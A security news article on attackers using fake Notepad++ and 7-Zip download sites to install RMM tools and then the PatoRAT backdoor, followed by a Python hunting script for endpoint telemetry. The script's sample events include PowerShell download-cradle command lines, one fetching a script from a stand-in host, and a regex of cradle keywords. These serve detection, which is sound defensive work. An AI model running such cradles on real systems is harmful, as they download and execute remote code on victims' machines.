Cybercriminals are increasingly distributing malicious Remote Monitoring and Management (RMM) tools through fake websites that mimic popular software download pages.
These deceptive sites impersonate legitimate utilities like Notepad++ and 7-Zip, tricking users into installing remote access tools such as LogMeIn Resolve instead of the software they intended to download.
Once installed, these RMM tools allow attackers to seize full control of infected systems, execute commands remotely, and deploy additional malware payloads like PatoRAT.
The attack begins when users land on fraudulent download pages, often through advertisements or search engine manipulation.
These websites closely replicate the appearance and layout of official software distribution sites, making detection difficult for average users.
When visitors attempt to download Notepad++ or 7-Zip, the fake sites deliver LogMeIn Resolve or PDQ Connect—legitimate remote management tools that attackers repurpose for malicious objectives.
These tools register with their respective infrastructures upon installation, establishing a persistent connection that threat actors exploit to maintain access.
ASEC analysts identified a significant increase in attacks leveraging RMM tools during the initial infection phase.
Unlike custom malware, these remote control applications are legitimately signed commercial products, so antivirus software does not flag them the way it flags a trojan, and the initial foothold is hard for security teams to spot.
The researchers documented cases where attackers deployed both LogMeIn Resolve and PDQ Connect to execute PowerShell commands and install backdoor malware, creating multiple pathways for system compromise and data theft.
Infection Mechanism and Remote Access Deployment
The infection process relies on social engineering tactics that exploit user trust in familiar software brands. Fake websites display convincing download buttons, version numbers, and installation options that mirror legitimate pages.
When users execute the downloaded installer, they unknowingly install LogMeIn Resolve or PDQ Connect instead of the expected utility.
These RMM tools offer features such as remote support, patch management, and system monitoring—capabilities designed for IT administrators but weaponized by attackers for unauthorized access.
After installation completes, the RMM agent enrols with its vendor's cloud-based management infrastructure under the account the attacker used to generate the installer. The attacker can then open a remote session from that console; the victim is never prompted to approve the connection or to supply any credentials.
The threat actors then execute PowerShell commands through the RMM interface to download and install PatoRAT, a backdoor that provides persistent access even if the RMM tool is later removed.
This multi-stage approach ensures continued control over compromised systems and allows attackers to deploy ransomware, steal credentials, or establish footholds in corporate networks.
Users should only download software from official websites and check the digital signature of any installer before running it. Note that a signature being present is not enough here: the LogMeIn Resolve and PDQ Connect installers are validly signed by their vendors, so the check that matters is whether the signer is the publisher of the software you meant to download.
Organizations should implement endpoint detection and response solutions capable of monitoring RMM tool activity, alerting on RMM agents that were not deployed by IT, and identifying suspicious remote access patterns such as an RMM agent spawning PowerShell, which indicate potential compromise.
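The two detections that follow from the chain described above (an installer whose file name mimics Notepad++ or 7-Zip but is signed by an RMM vendor, and an RMM agent launching PowerShell with a download cradle) can be expressed as simple hunting logic over endpoint telemetry. The code below is an added example, not code from ASEC or from this article. The event format is a constructed, Sysmon/EDR-style `Key="value"` line, the sample events are constructed, and the RMM signer strings and agent path fragments are placeholders that an analyst must replace with the exact values observed in their own environment.

```python
"""
Hunting logic for the RMM-abuse chain: a lure installer signed by an RMM
vendor, and an RMM agent spawning a shell that pulls a second-stage payload.

Added example (not ASEC's or the article's code). Event lines are a
constructed EDR-style format; indicator strings are placeholders.
"""
import re
from dataclasses import dataclass

# ASSUMPTION: placeholder indicators for the RMM products named in the
# article. Real signer names and install paths vary by version.
RMM_SIGNERS = ("logmein", "goto", "pdq")
RMM_PATH_HINTS = ("logmein", "gotoresolve", "pdq connect", "pdqconnect")

# File names advertised by the fake download pages (from the article).
LURE_NAMES = ("notepad++", "npp.", "7z", "7-zip")

SHELLS = ("powershell.exe", "pwsh.exe", "cmd.exe")

# Common PowerShell download/execution cradle fragments.
CRADLE_RE = re.compile(
    r"(invoke-webrequest|\biwr\b|downloadstring|downloadfile|"
    r"start-bitstransfer|-enc(odedcommand)?\b|frombase64string|"
    r"invoke-expression|\biex\b)",
    re.IGNORECASE,
)


@dataclass
class Event:
    image: str
    parent_image: str
    command_line: str
    signer: str


def parse_event(line: str) -> Event:
    """Parse a constructed 'Key="value" Key2="value"' telemetry line."""
    fields = dict(re.findall(r'(\w+)="([^"]*)"', line))
    return Event(
        image=fields.get("Image", ""),
        parent_image=fields.get("ParentImage", ""),
        command_line=fields.get("CommandLine", ""),
        signer=fields.get("Signer", ""),
    )


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_rmm_signer(signer: str) -> bool:
    return any(k in signer.lower() for k in RMM_SIGNERS)


def is_rmm_path(path: str) -> bool:
    return any(k in path.lower() for k in RMM_PATH_HINTS)


def lure_mismatch(ev: Event) -> bool:
    """Installer named like Notepad++/7-Zip but signed by an RMM vendor."""
    name = basename(ev.image)
    return any(l in name for l in LURE_NAMES) and is_rmm_signer(ev.signer)


def rmm_spawned_cradle(ev: Event) -> bool:
    """RMM agent launching a shell whose command line holds a download cradle."""
    return (
        basename(ev.image) in SHELLS
        and is_rmm_path(ev.parent_image)
        and CRADLE_RE.search(ev.command_line) is not None
    )


def hunt(lines):
    """Return (rule_name, offending_file) tuples for every line that matches."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if lure_mismatch(ev):
            alerts.append(("lure_mismatch", basename(ev.image)))
        if rmm_spawned_cradle(ev):
            alerts.append(("rmm_spawned_cradle", basename(ev.parent_image)))
    return alerts


# Constructed sample telemetry: one genuine installer, one lure, two RMM-driven
# cradles (placeholder agent paths) and one benign PowerShell launch.
SAMPLE_EVENTS = [
    r'Image="C:\Users\alice\Downloads\npp.8.6.Installer.x64.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="npp.8.6.Installer.x64.exe" Signer="Notepad++"',
    r'Image="C:\Users\alice\Downloads\notepad++_setup.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="notepad++_setup.exe" Signer="LogMeIn, Inc."',
    r'Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Program Files\LogMeIn Resolve\agent.exe" CommandLine="powershell -nop -w hidden -enc SQBFAFgA" Signer="Microsoft Windows"',
    r'Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="powershell Get-Date" Signer="Microsoft Windows"',
    r'Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Program Files\PDQ\PDQConnectAgent\pdq-connect-agent.exe" CommandLine="powershell IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/p.ps1\')" Signer="Microsoft Windows"',
]

if __name__ == "__main__":
    for rule, target in hunt(SAMPLE_EVENTS):
        print(f"{rule}: {target}")
```

The first rule catches the delivery stage (a file called notepad++_setup.exe should never carry an RMM vendor's signature), the second catches the post-enrolment stage regardless of which lure was used. Both are deliberately narrow; in production the path hints should be replaced with the exact agent binary names and hashes from your own inventory, and any RMM agent not on that inventory is itself worth an alert.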
